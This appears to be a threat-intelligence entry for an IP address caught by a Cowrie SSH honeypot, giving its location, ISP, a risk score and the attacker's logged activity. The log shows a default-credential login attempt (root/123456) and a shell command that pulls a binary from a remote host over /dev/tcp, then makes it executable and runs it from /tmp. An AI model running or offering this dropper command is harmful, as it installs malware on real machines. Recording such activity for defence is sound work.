Active ThreatLOW

8.134.132.220

Country of Origin🇨🇳 China
First Detection1/17/2026
Last Activity1/17/2026
ISPHangzhou Alibaba Advertising Co.,Ltd.
🎯
9
Total Attacks
🔌
1
Ports
📡
1
Attack Types
🦠
1
Malware

Geolocation

Country
🇨🇳 China
City
Guangzhou
ASN
AS37963
ISP
Hangzhou Alibaba Advertising Co.,Ltd.

Attack Types

cowrie

Attacked Ports

22

Associated Malware

Attempted Credentials

🔐root/123456
1x

Executed Commands

$nohup bash -c "exec 6<>/dev/tcp/37.148.210.191/60133 && echo -n 'GET /linux' >&6 && cat 0<&6 > /tmp/iaYNgGCjnX && chmod +x /tmp/iaYNgGCjnX && /tmp/iaYNgGCjnX eDwuOn9zJTI6e2U6OTpxfTsxOHhrPzclc3glMTN+ZTk1MX17OjI7a388Ljl/eSU4OWV9ODo9e3o6Nyt6ezguOnt6JTE+eGU5NzF9ezowO2tzJTE4f2U6MzlleTkwMX17OjA+aU/8RCIF" &1x
$dd bs=1 count=1911588 > /tmp/NUAcuNAAJN1x

Risk Assessment

20
/100
LowMediumHighCritical